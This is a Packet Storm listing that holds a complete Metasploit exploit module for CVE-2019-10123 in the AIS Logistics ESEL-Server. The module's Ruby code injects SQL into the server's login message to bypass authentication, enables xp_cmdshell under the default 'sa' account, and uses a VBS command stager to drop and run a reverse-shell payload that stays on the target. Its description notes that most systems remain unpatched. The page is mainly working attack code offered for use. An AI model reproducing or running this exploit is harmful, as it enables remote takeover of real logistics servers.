what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

AIS Logistics ESEL-Server SQL Injection / Code Execution

AIS Logistics ESEL-Server SQL Injection / Code Execution
Posted Apr 29, 2019
Authored by Manuel Feifel | Site metasploit.com

This Metasploit module will execute an arbitrary payload on an "ESEL" server used by the AIS logistic software. The server typically listens on port 5099 without TLS. There could also be server listening on 5100 with TLS but the port 5099 is usually always open. The login process is vulnerable to an SQL Injection. Usually a MSSQL Server with the 'sa' user is in place. This module was verified on version 67 but it should also run on lower versions. An fixed version was created by AIS in September 2017. However most systems have not been updated. In regard to the payload, unless there is a closed port in the web server, you dont want to use any "bind" payload. You want a "reverse" payload, probably to your port 80 or to any other outbound port allowed on the firewall. Currently, one delivery method is supported This method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses 'wcsript.exe' to generate the executable on the target. NOTE: This module will leave a payload executable on the target system when the attack is finished.

tags | exploit, web, arbitrary, sql injection
advisories | CVE-2019-10123
SHA-256 | 4e45fd56c2526e9ec010441d375b5776dbcf5a8819b5ef299ef6e3dc30fd9290

AIS Logistics ESEL-Server SQL Injection / Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::MSSQL_COMMANDS
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
'Description' => %q{
This module will execute an arbitrary payload on an "ESEL" server used by the
AIS logistic software. The server typically listens on port 5099 without TLS.
There could also be server listening on 5100 with TLS but the port 5099 is
usually always open.
The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
with the 'sa' user is in place.

This module was verified on version 67 but it should also run on lower versions.
An fixed version was created by AIS in September 2017. However most systems
have not been updated.

In regard to the payload, unless there is a closed port in the web server,
you dont want to use any "bind" payload. You want a "reverse" payload,
probably to your port 80 or to any other outbound port allowed on the firewall.

Currently, one delivery method is supported

This method takes advantage of the Command Stager subsystem. This allows using
various techniques, such as using a TFTP server, to send the executable. By default
the Command Stager uses 'wcsript.exe' to generate the executable on the target.

NOTE: This module will leave a payload executable on the target system when the
attack is finished.

},
'Author' =>
[
'Manuel Feifel'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-10123'],
],
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Payload' =>
{
'BadChars' => "\x00\xff\x27",
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => '2019-03-27',
'DefaultOptions' =>
{
'RPORT' => 5099
},
))
end

# This is method required for the CmdStager to work...
def execute_command(cmd, _opts)
cmd_xp = "EXEC master..xp_cmdshell '#{cmd}'"
send_login_msg(create_login_msg_sql(cmd_xp))
end

# prepends the required length to the message and sends it to the server
def send_login_msg(login_msg, check_response = true)
length = login_msg.length
length += length.to_s.length
login_msg = "#{length}#{login_msg}"

connect

sock.put(login_msg)
response = sock.recv(10000)

if check_response
if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
print_good('Correct response received => Data send successfully')
else
print_warning('Wrong response received => Probably data could not be sent successfully')
end
end

return response
ensure
# Every time a new Connection is required
disconnect
end

# embeds a sql command into the login message
def create_login_msg_sql(sql_cmd)
return create_login_msg("#{rand(1_000..9_999)}'; #{sql_cmd}--")
end

# create a plain login message
def create_login_msg(pw)
delim = "\xFF"
login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
"#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"

end

def check
int = rand(1..1_000)
response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR #{int}=#{int}--"), false)
if response_bypass.include? 'Zugangsdaten OK'
CheckCode::Vulnerable
else
print_status("Response was: #{response_bypass}")
CheckCode::Safe
end
end

def exploit
# enable xp cmdshell, used to execute commands later
# Software uses the 'sa' user by default
send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
# The porotocol has no limites on max-data
execute_cmdstager({ :linemax => 1500 })
print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
print_status('Stager should now be executed.')
end
end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close